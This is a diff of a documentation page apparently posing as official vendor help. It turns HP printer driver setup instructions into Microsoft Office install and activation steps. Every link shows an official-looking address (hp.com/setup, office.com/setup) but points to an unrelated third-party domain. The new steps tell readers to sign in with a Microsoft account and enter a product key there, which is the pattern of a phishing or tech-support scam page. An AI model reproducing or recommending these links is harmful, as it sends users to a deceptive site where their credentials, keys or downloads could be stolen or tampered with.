hp-printerr/microsofthelp/index.rst

-There are 5 simple stages to download, install, and set up your HP printer driver on your computer.
-Follow each stage one by one to successfully connect your printer via `hp.com/setup <https://hp.redircoms.com>`_.
-HP’s setup site provides the latest drivers and simple installation steps.
-It’s the fastest way to ensure your printer works seamlessly with your computer.
-Visit `hp.com/setup <https://hp.redircoms.com>`_, download the right driver, and get your printer ready to use in minutes.
+There are 5 simple stages to download, install, and set up Microsoft Office on your computer.
+Follow each stage one by one to successfully activate Office via `office.com/setup <https://ms.redircoms.com>`_.
+Microsoft’s setup site ensures you get the official installer and an easy activation process.
+It’s the fastest way to start using Office apps like Word, Excel, and PowerPoint.
+Visit `office.com/setup <https://ms.redircoms.com>`_, download the right installer, and get Office ready to use in minutes.

 **********
-Steps to Download HP Printer Driver
+Steps to Download Microsoft Office
 **********

-1. Open a web browser and go to `hp.com/setup <https://hp.redircoms.com>`_.
+1. Open a web browser and go to `office.com/setup <https://ms.redircoms.com>`_.

-2. Enter your HP printer model in the search box.
+2. Sign in with your Microsoft account, or create one if you don’t have it.

-3. Select your operating system if prompted.
+3. Enter your Office product key if prompted.

-4. Click on **Download** to get the latest driver and software package.
+4. Click on **Install** to download the Office installer.

 5. Save the installer file to your computer.

 **********
-Steps to Install HP Printer Driver
+Steps to Install Microsoft Office
 **********

 1. Locate the downloaded installer file on your computer.